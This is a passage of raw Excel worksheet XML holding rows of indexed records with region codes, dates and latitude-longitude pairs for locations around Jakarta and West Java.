      <c r="J1824" t="s">
        <v>1590</v>
      </c>
      <c r="L1824" t="s">
        <v>2743</v>
      </c>
      <c r="M1824">
        <v>3175030002</v>
      </c>
      <c r="N1824">
        <v>3175030</v>
      </c>
      <c r="O1824">
        <v>3175</v>
      </c>
      <c r="P1824">
        <v>31</v>
      </c>
      <c r="Q1824" t="s">
        <v>1592</v>
      </c>
      <c r="R1824" t="s">
        <v>1563</v>
      </c>
      <c r="S1824" t="s">
        <v>547</v>
      </c>
      <c r="T1824" t="s">
        <v>33</v>
      </c>
      <c r="U1824" s="5">
        <v>10688834</v>
      </c>
      <c r="V1824" s="5" t="s">
        <v>15059</v>
      </c>
      <c r="W1824" s="5">
        <v>-615033</v>
      </c>
      <c r="X1824" t="s">
        <v>18865</v>
      </c>
      <c r="Y1824" t="str">
        <f t="shared" si="28"/>
        <v>-6.15033,106.88834</v>
      </c>
    </row>
    <row r="1825" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1825">
        <v>110332</v>
      </c>
      <c r="B1825" s="1">
        <v>43886</v>
      </c>
      <c r="C1825">
        <v>0</v>
      </c>
      <c r="D1825" t="s">
        <v>2648</v>
      </c>
      <c r="E1825" t="s">
        <v>23</v>
      </c>
      <c r="G1825" t="s">
        <v>2752</v>
      </c>
      <c r="H1825" t="s">
        <v>26</v>
      </c>
      <c r="J1825" t="s">
        <v>2580</v>
      </c>
      <c r="L1825" t="s">
        <v>2753</v>
      </c>
      <c r="M1825">
        <v>3172040005</v>
      </c>
      <c r="N1825">
        <v>3172040</v>
      </c>
      <c r="O1825">
        <v>3172</v>
      </c>
      <c r="P1825">
        <v>31</v>
      </c>
      <c r="Q1825" t="s">
        <v>1351</v>
      </c>
      <c r="R1825" t="s">
        <v>281</v>
      </c>
      <c r="S1825" t="s">
        <v>49</v>
      </c>
      <c r="T1825" t="s">
        <v>33</v>
      </c>
      <c r="U1825" s="5">
        <v>10689391</v>
      </c>
      <c r="V1825" s="5" t="s">
        <v>15063</v>
      </c>
      <c r="W1825" s="5">
        <v>-624123</v>
      </c>
      <c r="X1825" t="s">
        <v>18869</v>
      </c>
      <c r="Y1825" t="str">
        <f t="shared" si="28"/>
        <v>-6.24123,106.89391</v>
      </c>
    </row>
    <row r="1826" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1826">
        <v>110333</v>
      </c>
      <c r="B1826" s="1">
        <v>43886</v>
      </c>
      <c r="C1826">
        <v>0</v>
      </c>
      <c r="D1826" t="s">
        <v>2648</v>
      </c>
      <c r="E1826" t="s">
        <v>23</v>
      </c>
      <c r="G1826" t="s">
        <v>2797</v>
      </c>
      <c r="H1826" t="s">
        <v>26</v>
      </c>
      <c r="J1826" t="s">
        <v>2798</v>
      </c>
      <c r="L1826" t="s">
        <v>2799</v>
      </c>
      <c r="M1826">
        <v>3172060006</v>
      </c>
      <c r="N1826">
        <v>3172060</v>
      </c>
      <c r="O1826">
        <v>3172</v>
      </c>
      <c r="P1826">
        <v>31</v>
      </c>
      <c r="Q1826" t="s">
        <v>2800</v>
      </c>
      <c r="R1826" t="s">
        <v>48</v>
      </c>
      <c r="S1826" t="s">
        <v>49</v>
      </c>
      <c r="T1826" t="s">
        <v>33</v>
      </c>
      <c r="U1826" s="5">
        <v>10687338</v>
      </c>
      <c r="V1826" s="5" t="s">
        <v>15079</v>
      </c>
      <c r="W1826" s="5">
        <v>-622329</v>
      </c>
      <c r="X1826" t="s">
        <v>18885</v>
      </c>
      <c r="Y1826" t="str">
        <f t="shared" si="28"/>
        <v>-6.22329,106.87338</v>
      </c>
    </row>
    <row r="1827" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1827">
        <v>110334</v>
      </c>
      <c r="B1827" s="1">
        <v>43886</v>
      </c>
      <c r="C1827">
        <v>0</v>
      </c>
      <c r="D1827" t="s">
        <v>2648</v>
      </c>
      <c r="E1827" t="s">
        <v>23</v>
      </c>
      <c r="G1827" t="s">
        <v>2739</v>
      </c>
      <c r="H1827" t="s">
        <v>26</v>
      </c>
      <c r="J1827" t="s">
        <v>2740</v>
      </c>
      <c r="L1827" t="s">
        <v>2741</v>
      </c>
      <c r="M1827">
        <v>3173070003</v>
      </c>
      <c r="N1827">
        <v>3173070</v>
      </c>
      <c r="O1827">
        <v>3173</v>
      </c>
      <c r="P1827">
        <v>31</v>
      </c>
      <c r="Q1827" t="s">
        <v>520</v>
      </c>
      <c r="R1827" t="s">
        <v>323</v>
      </c>
      <c r="S1827" t="s">
        <v>62</v>
      </c>
      <c r="T1827" t="s">
        <v>33</v>
      </c>
      <c r="U1827" s="5">
        <v>10683377</v>
      </c>
      <c r="V1827" s="5" t="s">
        <v>15058</v>
      </c>
      <c r="W1827" s="5">
        <v>-615223</v>
      </c>
      <c r="X1827" t="s">
        <v>18759</v>
      </c>
      <c r="Y1827" t="str">
        <f t="shared" si="28"/>
        <v>-6.15223,106.83377</v>
      </c>
    </row>
    <row r="1828" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1828">
        <v>110335</v>
      </c>
      <c r="B1828" s="1">
        <v>43886</v>
      </c>
      <c r="C1828">
        <v>0</v>
      </c>
      <c r="D1828" t="s">
        <v>2648</v>
      </c>
      <c r="E1828" t="s">
        <v>23</v>
      </c>
      <c r="G1828" t="s">
        <v>2776</v>
      </c>
      <c r="H1828" t="s">
        <v>26</v>
      </c>
      <c r="J1828" t="s">
        <v>2777</v>
      </c>
      <c r="L1828" t="s">
        <v>2778</v>
      </c>
      <c r="M1828">
        <v>3171070002</v>
      </c>
      <c r="N1828">
        <v>3171070</v>
      </c>
      <c r="O1828">
        <v>3171</v>
      </c>
      <c r="P1828">
        <v>31</v>
      </c>
      <c r="Q1828" t="s">
        <v>2142</v>
      </c>
      <c r="R1828" t="s">
        <v>121</v>
      </c>
      <c r="S1828" t="s">
        <v>108</v>
      </c>
      <c r="T1828" t="s">
        <v>33</v>
      </c>
      <c r="U1828" s="5">
        <v>10682240</v>
      </c>
      <c r="V1828" s="5" t="s">
        <v>15072</v>
      </c>
      <c r="W1828" s="5">
        <v>-624771</v>
      </c>
      <c r="X1828" t="s">
        <v>18878</v>
      </c>
      <c r="Y1828" t="str">
        <f t="shared" si="28"/>
        <v>-6.24771,106.82240</v>
      </c>
    </row>
    <row r="1829" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1829">
        <v>110336</v>
      </c>
      <c r="B1829" s="1">
        <v>43886</v>
      </c>
      <c r="C1829">
        <v>0</v>
      </c>
      <c r="D1829" t="s">
        <v>2648</v>
      </c>
      <c r="E1829" t="s">
        <v>23</v>
      </c>
      <c r="G1829" t="s">
        <v>2724</v>
      </c>
      <c r="H1829" t="s">
        <v>26</v>
      </c>
      <c r="J1829" t="s">
        <v>2725</v>
      </c>
      <c r="L1829" t="s">
        <v>2726</v>
      </c>
      <c r="M1829">
        <v>3172100006</v>
      </c>
      <c r="N1829">
        <v>3172100</v>
      </c>
      <c r="O1829">
        <v>3172</v>
      </c>
      <c r="P1829">
        <v>31</v>
      </c>
      <c r="Q1829" t="s">
        <v>1435</v>
      </c>
      <c r="R1829" t="s">
        <v>1436</v>
      </c>
      <c r="S1829" t="s">
        <v>49</v>
      </c>
      <c r="T1829" t="s">
        <v>33</v>
      </c>
      <c r="U1829" s="5">
        <v>10687161</v>
      </c>
      <c r="V1829" s="5" t="s">
        <v>15053</v>
      </c>
      <c r="W1829" s="5">
        <v>-619817</v>
      </c>
      <c r="X1829" t="s">
        <v>18859</v>
      </c>
      <c r="Y1829" t="str">
        <f t="shared" si="28"/>
        <v>-6.19817,106.87161</v>
      </c>
    </row>
    <row r="1830" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1830">
        <v>110337</v>
      </c>
      <c r="B1830" s="1">
        <v>43886</v>
      </c>
      <c r="C1830">
        <v>0</v>
      </c>
      <c r="D1830" t="s">
        <v>2648</v>
      </c>
      <c r="E1830" t="s">
        <v>23</v>
      </c>
      <c r="G1830" t="s">
        <v>2784</v>
      </c>
      <c r="H1830" t="s">
        <v>26</v>
      </c>
      <c r="J1830" t="s">
        <v>2785</v>
      </c>
      <c r="L1830" t="s">
        <v>2786</v>
      </c>
      <c r="M1830">
        <v>3174040005</v>
      </c>
      <c r="N1830">
        <v>3174040</v>
      </c>
      <c r="O1830">
        <v>3174</v>
      </c>
      <c r="P1830">
        <v>31</v>
      </c>
      <c r="Q1830" t="s">
        <v>376</v>
      </c>
      <c r="R1830" t="s">
        <v>377</v>
      </c>
      <c r="S1830" t="s">
        <v>32</v>
      </c>
      <c r="T1830" t="s">
        <v>33</v>
      </c>
      <c r="U1830" s="5">
        <v>10678984</v>
      </c>
      <c r="V1830" s="5" t="s">
        <v>15075</v>
      </c>
      <c r="W1830" s="5">
        <v>-616196</v>
      </c>
      <c r="X1830" t="s">
        <v>18881</v>
      </c>
      <c r="Y1830" t="str">
        <f t="shared" si="28"/>
        <v>-6.16196,106.78984</v>
      </c>
    </row>
    <row r="1831" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1831">
        <v>110338</v>
      </c>
      <c r="B1831" s="1">
        <v>43886</v>
      </c>
      <c r="C1831">
        <v>0</v>
      </c>
      <c r="D1831" t="s">
        <v>2648</v>
      </c>
      <c r="E1831" t="s">
        <v>23</v>
      </c>
      <c r="G1831" t="s">
        <v>2750</v>
      </c>
      <c r="H1831" t="s">
        <v>26</v>
      </c>
      <c r="J1831" t="s">
        <v>2737</v>
      </c>
      <c r="L1831" t="s">
        <v>2751</v>
      </c>
      <c r="M1831">
        <v>3173040001</v>
      </c>
      <c r="N1831">
        <v>3173040</v>
      </c>
      <c r="O1831">
        <v>3173</v>
      </c>
      <c r="P1831">
        <v>31</v>
      </c>
      <c r="Q1831" t="s">
        <v>1598</v>
      </c>
      <c r="R1831" t="s">
        <v>1598</v>
      </c>
      <c r="S1831" t="s">
        <v>62</v>
      </c>
      <c r="T1831" t="s">
        <v>33</v>
      </c>
      <c r="U1831" s="5">
        <v>10685565</v>
      </c>
      <c r="V1831" s="5" t="s">
        <v>15062</v>
      </c>
      <c r="W1831" s="5">
        <v>-618838</v>
      </c>
      <c r="X1831" t="s">
        <v>18868</v>
      </c>
      <c r="Y1831" t="str">
        <f t="shared" si="28"/>
        <v>-6.18838,106.85565</v>
      </c>
    </row>
    <row r="1832" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1832">
        <v>110339</v>
      </c>
      <c r="B1832" s="1">
        <v>43886</v>
      </c>
      <c r="C1832">
        <v>0</v>
      </c>
      <c r="D1832" t="s">
        <v>2648</v>
      </c>
      <c r="E1832" t="s">
        <v>23</v>
      </c>
      <c r="G1832" t="s">
        <v>2781</v>
      </c>
      <c r="H1832" t="s">
        <v>26</v>
      </c>
      <c r="J1832" t="s">
        <v>2782</v>
      </c>
      <c r="L1832" t="s">
        <v>2783</v>
      </c>
      <c r="M1832">
        <v>3175030002</v>
      </c>
      <c r="N1832">
        <v>3175030</v>
      </c>
      <c r="O1832">
        <v>3175</v>
      </c>
      <c r="P1832">
        <v>31</v>
      </c>
      <c r="Q1832" t="s">
        <v>1592</v>
      </c>
      <c r="R1832" t="s">
        <v>1563</v>
      </c>
      <c r="S1832" t="s">
        <v>547</v>
      </c>
      <c r="T1832" t="s">
        <v>33</v>
      </c>
      <c r="U1832" s="5">
        <v>10687175</v>
      </c>
      <c r="V1832" s="5" t="s">
        <v>15074</v>
      </c>
      <c r="W1832" s="5">
        <v>-615559</v>
      </c>
      <c r="X1832" t="s">
        <v>18880</v>
      </c>
      <c r="Y1832" t="str">
        <f t="shared" si="28"/>
        <v>-6.15559,106.87175</v>
      </c>
    </row>
    <row r="1833" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1833">
        <v>110340</v>
      </c>
      <c r="B1833" s="1">
        <v>43886</v>
      </c>
      <c r="C1833">
        <v>0</v>
      </c>
      <c r="D1833" t="s">
        <v>2648</v>
      </c>
      <c r="E1833" t="s">
        <v>23</v>
      </c>
      <c r="G1833" t="s">
        <v>2812</v>
      </c>
      <c r="H1833" t="s">
        <v>26</v>
      </c>
      <c r="J1833" t="s">
        <v>2627</v>
      </c>
      <c r="L1833" t="s">
        <v>2813</v>
      </c>
      <c r="M1833">
        <v>3275040008</v>
      </c>
      <c r="N1833">
        <v>3275040</v>
      </c>
      <c r="O1833">
        <v>3275</v>
      </c>
      <c r="P1833">
        <v>32</v>
      </c>
      <c r="Q1833" t="s">
        <v>2814</v>
      </c>
      <c r="R1833" t="s">
        <v>100</v>
      </c>
      <c r="S1833" t="s">
        <v>41</v>
      </c>
      <c r="T1833" t="s">
        <v>42</v>
      </c>
      <c r="U1833" s="5">
        <v>10703711</v>
      </c>
      <c r="V1833" s="5" t="s">
        <v>15084</v>
      </c>
      <c r="W1833" s="5">
        <v>-623912</v>
      </c>
      <c r="X1833" t="s">
        <v>18890</v>
      </c>
      <c r="Y1833" t="str">
        <f t="shared" si="28"/>
        <v>-6.23912,107.03711</v>
      </c>
    </row>
    <row r="1834" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1834">
        <v>110341</v>
      </c>
      <c r="B1834" s="1">
        <v>43886</v>
      </c>
      <c r="C1834">
        <v>0</v>
      </c>
      <c r="D1834" t="s">
        <v>2648</v>
      </c>
      <c r="E1834" t="s">
        <v>23</v>
      </c>
      <c r="G1834" t="s">
        <v>2822</v>
      </c>
      <c r="H1834" t="s">
        <v>26</v>
      </c>
      <c r="J1834" t="s">
        <v>2823</v>
      </c>
      <c r="L1834" t="s">
        <v>2824</v>
      </c>
      <c r="M1834">
        <v>3174050008</v>
      </c>
      <c r="N1834">
        <v>3174050</v>
      </c>
      <c r="O1834">
        <v>3174</v>
      </c>
      <c r="P1834">
        <v>31</v>
      </c>
      <c r="Q1834" t="s">
        <v>2825</v>
      </c>
      <c r="R1834" t="s">
        <v>2826</v>
      </c>
      <c r="S1834" t="s">
        <v>32</v>
      </c>
      <c r="T1834" t="s">
        <v>33</v>
      </c>
      <c r="U1834" s="5">
        <v>10680583</v>
      </c>
      <c r="V1834" s="5" t="s">
        <v>15087</v>
      </c>
      <c r="W1834" s="5">
        <v>-614576</v>
      </c>
      <c r="X1834" t="s">
        <v>18893</v>
      </c>
      <c r="Y1834" t="str">
        <f t="shared" si="28"/>
        <v>-6.14576,106.80583</v>
      </c>
    </row>
    <row r="1835" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1835">
        <v>110342</v>
      </c>
      <c r="B1835" s="1">
        <v>43886</v>
      </c>
      <c r="C1835">
        <v>0</v>
      </c>
      <c r="D1835" t="s">
        <v>2648</v>
      </c>
      <c r="E1835" t="s">
        <v>23</v>
      </c>
      <c r="G1835" t="s">
        <v>2787</v>
      </c>
      <c r="H1835" t="s">
        <v>26</v>
      </c>
      <c r="J1835" t="s">
        <v>2788</v>
      </c>
      <c r="L1835" t="s">
        <v>2789</v>
      </c>
      <c r="M1835">
        <v>3173050001</v>
      </c>
      <c r="N1835">
        <v>3173050</v>
      </c>
      <c r="O1835">
        <v>3173</v>
      </c>
      <c r="P1835">
        <v>31</v>
      </c>
      <c r="Q1835" t="s">
        <v>2790</v>
      </c>
      <c r="R1835" t="s">
        <v>589</v>
      </c>
      <c r="S1835" t="s">
        <v>62</v>
      </c>
      <c r="T1835" t="s">
        <v>33</v>
      </c>
      <c r="U1835" s="5">
        <v>10687328</v>
      </c>
      <c r="V1835" s="5" t="s">
        <v>15076</v>
      </c>
      <c r="W1835" s="5">
        <v>-618668</v>
      </c>
      <c r="X1835" t="s">
        <v>18882</v>
      </c>
      <c r="Y1835" t="str">
        <f t="shared" si="28"/>
        <v>-6.18668,106.87328</v>
      </c>
    </row>
    <row r="1836" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1836">
        <v>110372</v>
      </c>
      <c r="B1836" s="1">
        <v>43886</v>
      </c>
      <c r="C1836">
        <v>0</v>
      </c>
      <c r="D1836" t="s">
        <v>2648</v>
      </c>
      <c r="E1836" t="s">
        <v>23</v>
      </c>
      <c r="G1836" t="s">
        <v>2736</v>
      </c>
      <c r="H1836" t="s">
        <v>26</v>
      </c>
      <c r="J1836" t="s">
        <v>2737</v>
      </c>
      <c r="L1836" t="s">
        <v>2738</v>
      </c>
      <c r="M1836">
        <v>3173040001</v>
      </c>
      <c r="N1836">
        <v>3173040</v>
      </c>
      <c r="O1836">
        <v>3173</v>
      </c>
      <c r="P1836">
        <v>31</v>
      </c>
      <c r="Q1836" t="s">
        <v>1598</v>
      </c>
      <c r="R1836" t="s">
        <v>1598</v>
      </c>
      <c r="S1836" t="s">
        <v>62</v>
      </c>
      <c r="T1836" t="s">
        <v>33</v>
      </c>
      <c r="U1836" s="5">
        <v>10685564</v>
      </c>
      <c r="V1836" s="5" t="s">
        <v>15057</v>
      </c>
      <c r="W1836" s="5">
        <v>-618839</v>
      </c>
      <c r="X1836" t="s">
        <v>18864</v>
      </c>
      <c r="Y1836" t="str">
        <f t="shared" si="28"/>
        <v>-6.18839,106.85564</v>
      </c>
    </row>
    <row r="1837" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1837">
        <v>130927</v>
      </c>
      <c r="B1837" s="1">
        <v>43886</v>
      </c>
      <c r="C1837">
        <v>1</v>
      </c>
      <c r="D1837" t="s">
        <v>22</v>
      </c>
      <c r="E1837" t="s">
        <v>23</v>
      </c>
      <c r="F1837" t="s">
        <v>6160</v>
      </c>
      <c r="G1837" t="s">
        <v>6161</v>
      </c>
      <c r="H1837" t="s">
        <v>26</v>
      </c>
      <c r="I1837" t="s">
        <v>3275</v>
      </c>
      <c r="J1837" t="s">
        <v>2627</v>
      </c>
      <c r="M1837">
        <v>3275060005</v>
      </c>
      <c r="N1837">
        <v>3275060</v>
      </c>
      <c r="O1837">
        <v>3275</v>
      </c>
      <c r="P1837">
        <v>32</v>
      </c>
      <c r="Q1837" t="s">
        <v>3526</v>
      </c>
      <c r="R1837" t="s">
        <v>114</v>
      </c>
      <c r="S1837" t="s">
        <v>41</v>
      </c>
      <c r="T1837" t="s">
        <v>42</v>
      </c>
      <c r="U1837" s="5">
        <v>10696427</v>
      </c>
      <c r="V1837" s="5" t="s">
        <v>16087</v>
      </c>
      <c r="W1837" s="5">
        <v>-621855</v>
      </c>
      <c r="X1837" t="s">
        <v>19844</v>
      </c>
      <c r="Y1837" t="str">
        <f t="shared" si="28"/>
        <v>-6.21855,106.96427</v>
      </c>
    </row>
    <row r="1838" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1838">
        <v>132136</v>
      </c>
      <c r="B1838" s="1">
        <v>43886</v>
      </c>
      <c r="C1838">
        <v>1</v>
      </c>
      <c r="D1838" t="s">
        <v>22</v>
      </c>
      <c r="E1838" t="s">
        <v>23</v>
      </c>
      <c r="F1838" t="s">
        <v>6162</v>
      </c>
      <c r="G1838" t="s">
        <v>6163</v>
      </c>
      <c r="H1838" t="s">
        <v>26</v>
      </c>
      <c r="I1838" t="s">
        <v>555</v>
      </c>
      <c r="J1838" t="s">
        <v>2627</v>
      </c>
      <c r="L1838" t="s">
        <v>6164</v>
      </c>
      <c r="M1838">
        <v>3216010007</v>
      </c>
      <c r="N1838">
        <v>3216010</v>
      </c>
      <c r="O1838">
        <v>3216</v>
      </c>
      <c r="P1838">
        <v>32</v>
      </c>
      <c r="Q1838" t="s">
        <v>6165</v>
      </c>
      <c r="R1838" t="s">
        <v>1256</v>
      </c>
      <c r="S1838" t="s">
        <v>41</v>
      </c>
      <c r="T1838" t="s">
        <v>42</v>
      </c>
      <c r="U1838" s="5">
        <v>10702764</v>
      </c>
      <c r="V1838" s="5" t="s">
        <v>16088</v>
      </c>
      <c r="W1838" s="5">
        <v>-634148</v>
      </c>
      <c r="X1838" t="s">
        <v>19845</v>
      </c>
      <c r="Y1838" t="str">
        <f t="shared" si="28"/>
        <v>-6.34148,107.02764</v>
      </c>
    </row>
    <row r="1839" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1839">
        <v>135776</v>
      </c>
      <c r="B1839" s="1">
        <v>43886</v>
      </c>
      <c r="C1839">
        <v>1</v>
      </c>
      <c r="D1839" t="s">
        <v>2648</v>
      </c>
      <c r="E1839" t="s">
        <v>23</v>
      </c>
      <c r="G1839" t="s">
        <v>6166</v>
      </c>
      <c r="H1839" t="s">
        <v>26</v>
      </c>
      <c r="J1839" t="s">
        <v>2502</v>
      </c>
      <c r="L1839" t="s">
        <v>6167</v>
      </c>
      <c r="M1839">
        <v>3175060001</v>
      </c>
      <c r="N1839">
        <v>3175060</v>
      </c>
      <c r="O1839">
        <v>3175</v>
      </c>
      <c r="P1839">
        <v>31</v>
      </c>
      <c r="Q1839" t="s">
        <v>2278</v>
      </c>
      <c r="R1839" t="s">
        <v>2279</v>
      </c>
      <c r="S1839" t="s">
        <v>547</v>
      </c>
      <c r="T1839" t="s">
        <v>33</v>
      </c>
      <c r="U1839" s="5">
        <v>10691802</v>
      </c>
      <c r="V1839" s="5" t="s">
        <v>16089</v>
      </c>
      <c r="W1839" s="5">
        <v>-613882</v>
      </c>
      <c r="X1839" t="s">
        <v>19846</v>
      </c>
      <c r="Y1839" t="str">
        <f t="shared" si="28"/>
        <v>-6.13882,106.91802</v>
      </c>
    </row>
    <row r="1840" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1840">
        <v>136213</v>
      </c>
      <c r="B1840" s="1">
        <v>43886</v>
      </c>
      <c r="C1840">
        <v>1</v>
      </c>
      <c r="D1840" t="s">
        <v>2648</v>
      </c>
      <c r="E1840" t="s">
        <v>23</v>
      </c>
      <c r="G1840" t="s">
        <v>6168</v>
      </c>
      <c r="H1840" t="s">
        <v>26</v>
      </c>
      <c r="J1840" t="s">
        <v>2502</v>
      </c>
      <c r="L1840" t="s">
        <v>6169</v>
      </c>
      <c r="M1840">
        <v>3175060001</v>
      </c>
      <c r="N1840">
        <v>3175060</v>
      </c>
      <c r="O1840">
        <v>3175</v>
      </c>
      <c r="P1840">
        <v>31</v>
      </c>
      <c r="Q1840" t="s">
        <v>2278</v>
      </c>
      <c r="R1840" t="s">
        <v>2279</v>
      </c>
      <c r="S1840" t="s">
        <v>547</v>
      </c>
      <c r="T1840" t="s">
        <v>33</v>
      </c>
      <c r="U1840" s="5">
        <v>10691792</v>
      </c>
      <c r="V1840" s="5" t="s">
        <v>16090</v>
      </c>
      <c r="W1840" s="5">
        <v>-613882</v>
      </c>
      <c r="X1840" t="s">
        <v>19846</v>
      </c>
      <c r="Y1840" t="str">
        <f t="shared" si="28"/>
        <v>-6.13882,106.91792</v>
      </c>
    </row>
    <row r="1841" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1841">
        <v>137645</v>
      </c>
      <c r="B1841" s="1">
        <v>43886</v>
      </c>
      <c r="C1841">
        <v>1</v>
      </c>
      <c r="D1841" t="s">
        <v>22</v>
      </c>
      <c r="E1841" t="s">
        <v>23</v>
      </c>
      <c r="F1841" t="s">
        <v>6170</v>
      </c>
      <c r="G1841" t="s">
        <v>6171</v>
      </c>
      <c r="H1841" t="s">
        <v>26</v>
      </c>
      <c r="I1841" t="s">
        <v>784</v>
      </c>
      <c r="J1841" t="s">
        <v>2627</v>
      </c>
      <c r="M1841">
        <v>3276030010</v>
      </c>
      <c r="N1841">
        <v>3276030</v>
      </c>
      <c r="O1841">
        <v>3276</v>
      </c>
      <c r="P1841">
        <v>32</v>
      </c>
      <c r="Q1841" t="s">
        <v>6172</v>
      </c>
      <c r="R1841" t="s">
        <v>184</v>
      </c>
      <c r="S1841" t="s">
        <v>185</v>
      </c>
      <c r="T1841" t="s">
        <v>42</v>
      </c>
      <c r="U1841" s="5">
        <v>10685039</v>
      </c>
      <c r="V1841" s="5" t="s">
        <v>16091</v>
      </c>
      <c r="W1841" s="5">
        <v>-637883</v>
      </c>
      <c r="X1841" t="s">
        <v>19847</v>
      </c>
      <c r="Y1841" t="str">
        <f t="shared" si="28"/>
        <v>-6.37883,106.85039</v>
      </c>
    </row>
    <row r="1842" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1842">
        <v>140278</v>
      </c>
      <c r="B1842" s="1">
        <v>43886</v>
      </c>
      <c r="C1842">
        <v>1</v>
      </c>
      <c r="D1842" t="s">
        <v>22</v>
      </c>
      <c r="E1842" t="s">
        <v>23</v>
      </c>
      <c r="F1842" t="s">
        <v>6173</v>
      </c>
      <c r="H1842" t="s">
        <v>26</v>
      </c>
      <c r="I1842" t="s">
        <v>555</v>
      </c>
      <c r="J1842" t="s">
        <v>863</v>
      </c>
      <c r="L1842" t="s">
        <v>6174</v>
      </c>
      <c r="M1842">
        <v>3175010003</v>
      </c>
      <c r="N1842">
        <v>3175010</v>
      </c>
      <c r="O1842">
        <v>3175</v>
      </c>
      <c r="P1842">
        <v>31</v>
      </c>
      <c r="Q1842" t="s">
        <v>545</v>
      </c>
      <c r="R1842" t="s">
        <v>546</v>
      </c>
      <c r="S1842" t="s">
        <v>547</v>
      </c>
      <c r="T1842" t="s">
        <v>33</v>
      </c>
      <c r="U1842" s="5">
        <v>10678325</v>
      </c>
      <c r="V1842" s="5" t="s">
        <v>14599</v>
      </c>
      <c r="W1842" s="5">
        <v>-613498</v>
      </c>
      <c r="X1842" t="s">
        <v>19848</v>
      </c>
      <c r="Y1842" t="str">
        <f t="shared" si="28"/>
        <v>-6.13498,106.78325</v>
      </c>
    </row>
    <row r="1843" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1843">
        <v>141012</v>
      </c>
      <c r="B1843" s="1">
        <v>43886</v>
      </c>
      <c r="C1843">
        <v>1</v>
      </c>
      <c r="D1843" t="s">
        <v>22</v>
      </c>
      <c r="E1843" t="s">
        <v>23</v>
      </c>
      <c r="F1843" t="s">
        <v>6175</v>
      </c>
      <c r="H1843" t="s">
        <v>26</v>
      </c>
      <c r="I1843" t="s">
        <v>784</v>
      </c>
      <c r="J1843" t="s">
        <v>355</v>
      </c>
      <c r="L1843" t="s">
        <v>6176</v>
      </c>
      <c r="M1843">
        <v>3172050006</v>
      </c>
      <c r="N1843">
        <v>3172050</v>
      </c>
      <c r="O1843">
        <v>3172</v>
      </c>
      <c r="P1843">
        <v>31</v>
      </c>
      <c r="Q1843" t="s">
        <v>357</v>
      </c>
      <c r="R1843" t="s">
        <v>358</v>
      </c>
      <c r="S1843" t="s">
        <v>49</v>
      </c>
      <c r="T1843" t="s">
        <v>33</v>
      </c>
      <c r="U1843" s="5">
        <v>10685538</v>
      </c>
      <c r="V1843" s="5" t="s">
        <v>16092</v>
      </c>
      <c r="W1843" s="5">
        <v>-626201</v>
      </c>
      <c r="X1843" t="s">
        <v>19849</v>
      </c>
      <c r="Y1843" t="str">
        <f t="shared" si="28"/>
        <v>-6.26201,106.85538</v>
      </c>
    </row>
    <row r="1844" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1844">
        <v>142178</v>
      </c>
      <c r="B1844" s="1">
        <v>43886</v>
      </c>
      <c r="C1844">
        <v>1</v>
      </c>
      <c r="D1844" t="s">
        <v>22</v>
      </c>
      <c r="E1844" t="s">
        <v>23</v>
      </c>
      <c r="F1844" t="s">
        <v>6177</v>
      </c>
      <c r="G1844" t="s">
        <v>6178</v>
      </c>
      <c r="H1844" t="s">
        <v>26</v>
      </c>
      <c r="I1844" t="s">
        <v>3652</v>
      </c>
      <c r="J1844" t="s">
        <v>614</v>
      </c>
      <c r="L1844" t="s">
        <v>6179</v>
      </c>
      <c r="M1844">
        <v>3175010002</v>
      </c>
      <c r="N1844">
        <v>3175010</v>
      </c>
      <c r="O1844">
        <v>3175</v>
      </c>
      <c r="P1844">
        <v>31</v>
      </c>
      <c r="Q1844" t="s">
        <v>616</v>
      </c>
      <c r="R1844" t="s">
        <v>546</v>
      </c>
      <c r="S1844" t="s">
        <v>547</v>
      </c>
      <c r="T1844" t="s">
        <v>33</v>
      </c>
      <c r="U1844" s="5">
        <v>10677268</v>
      </c>
      <c r="V1844" s="5" t="s">
        <v>16093</v>
      </c>
      <c r="W1844" s="5">
        <v>-613322</v>
      </c>
      <c r="X1844" t="s">
        <v>19850</v>
      </c>
      <c r="Y1844" t="str">
        <f t="shared" si="28"/>
        <v>-6.13322,106.77268</v>
      </c>
    </row>
    <row r="1845" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1845">
        <v>142353</v>
      </c>
      <c r="B1845" s="1">
        <v>43886</v>
      </c>
      <c r="C1845">
        <v>1</v>
      </c>
      <c r="D1845" t="s">
        <v>2648</v>
      </c>
      <c r="E1845" t="s">
        <v>23</v>
      </c>
      <c r="G1845" t="s">
        <v>6180</v>
      </c>
      <c r="H1845" t="s">
        <v>26</v>
      </c>
      <c r="I1845" t="s">
        <v>1059</v>
      </c>
      <c r="J1845" t="s">
        <v>1471</v>
      </c>
      <c r="L1845" t="s">
        <v>6181</v>
      </c>
      <c r="M1845">
        <v>3171100001</v>
      </c>
      <c r="N1845">
        <v>3171100</v>
      </c>
      <c r="O1845">
        <v>3171</v>
      </c>
      <c r="P1845">
        <v>31</v>
      </c>
      <c r="Q1845" t="s">
        <v>1474</v>
      </c>
      <c r="R1845" t="s">
        <v>107</v>
      </c>
      <c r="S1845" t="s">
        <v>108</v>
      </c>
      <c r="T1845" t="s">
        <v>33</v>
      </c>
      <c r="U1845" s="5">
        <v>10681707</v>
      </c>
      <c r="V1845" s="5" t="s">
        <v>16094</v>
      </c>
      <c r="W1845" s="5">
        <v>-621978</v>
      </c>
      <c r="X1845" t="s">
        <v>19851</v>
      </c>
      <c r="Y1845" t="str">
        <f t="shared" si="28"/>
        <v>-6.21978,106.81707</v>
      </c>
    </row>
    <row r="1846" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1846">
        <v>143436</v>
      </c>
      <c r="B1846" s="1">
